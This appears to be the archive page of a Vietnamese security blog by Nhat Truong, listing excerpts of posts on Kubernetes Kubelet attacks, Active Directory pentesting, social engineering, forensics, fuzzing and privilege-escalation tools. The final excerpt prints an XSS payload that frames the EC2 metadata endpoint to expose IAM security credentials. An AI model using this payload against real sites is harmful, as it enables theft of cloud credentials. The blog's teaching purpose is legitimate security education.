Xin chào mọi người, gần đây có một website được nhiều người quan tâm của OpenAI là ChatGPT, nó rất thú vị và có khả năng thay thế Stack Overflow. Tuy nhiên, hiện chỉ có 156 quốc gia được đăng kí sử dụng (trừ Việt Nam). Mình sẽ giúp các bạn đăng kí dễ dàngContinueContinue reading “Cách đăng ký ChatGPT OpenAI tại Việt Nam”
Author Archives: Nhat Truong
Tấn công các cụm Kubernetes qua lỗi API Kubelet misconfigure
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Giới thiệu Kubelet là một agent trong từng node, có tác dụng quản lý tất cả container. KubeletContinueContinue reading “Tấn công các cụm Kubernetes qua lỗi API Kubelet misconfigure”
MSSQL Database Forensic (SQL Server)
GIỚI THIỆU Lợi ích của điều tra số Database nói chung: Truy cứu nguồn gốc các hoạt động DML và DDL của người dùng. Xác định các dữ liệu trước và sau câu truy vấn. Phục hồi các row data bị xoá Có thể giúp chứng minh hoặc bác bỏ một tình huống thất thoátContinueContinue reading “MSSQL Database Forensic (SQL Server)”
Pentest/Redteam Active Directory (AD)
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Sr ảnh bìa to hơn ảnh chính :v anh em ấn vào ảnh dưới đây rồi phóng toContinueContinue reading “Pentest/Redteam Active Directory (AD)”
Tấn công Social Engineering toàn tập [part 2]
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Phân loại Social Engineering Social Engineering có thể được chia thành hai loại phổ biến: Human-Based Social EngineeringContinueContinue reading “Tấn công Social Engineering toàn tập [part 2]”
Tấn công Social Engineering toàn tập [part 1]
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Giới thiệu Trên thế giới, khi nói về vấn đề bảo mật thông tin, người ta không thểContinueContinue reading “Tấn công Social Engineering toàn tập [part 1]”
Các sử dụng một số usecase của CSP (Content Security Policy)
GIỚI THIỆU CSP (Content Security Policy) là một công nghệ bảo mật cho phép bạn kiểm soát các nguồn tài nguyên mà trình duyệt được phép tải xuống trong trang web của bạn. Đây là một cách hiệu quả để ngăn chặn các cuộc tấn công XSS (Cross-Site Scripting) và các cuộc tấn công khácContinueContinue reading “Các sử dụng một số usecase của CSP (Content Security Policy)”
FUZZING VỚI AFL
Giới thiệu American Fuzzy Lop, được viết tắt là AFL là một công cụ kiểm thử mờ thông minh. Được dùng để tìm các lỗ hổng phần mềm bằng cách gửi dữ liệu đầu vào có định đạng sai tới ứng dụng. Nếu phần mềm crash hoặc hoạt động không đúng dự kiến, nó cóContinueContinue reading “FUZZING VỚI AFL”
Dò quét lỗ hổng nâng quyền Windows/Unix
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” Hỗ trợ leo quyền bằng LinEnumhttps://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAShttps://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh Hỗ trợ leo quyền bằng winPEAShttps://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe/winPEAS/bin/x64/Release
XXS get token from AWS
“Mọi kiến thức trong bài viết chỉ phục vụ mục đích giáo dục và an toàn thông tin.Không được sử dụng để tấn công hệ thống mà bạn không sở hữu hoặc không được phép kiểm thử.” </script><script>document.write(‘<iframe src=\”http://xxx/latest/meta-data/iam/security-credentials/EC2CloudWatchRole\” width=1000px height=1000px>’)</script>
Nhat Truong Blog 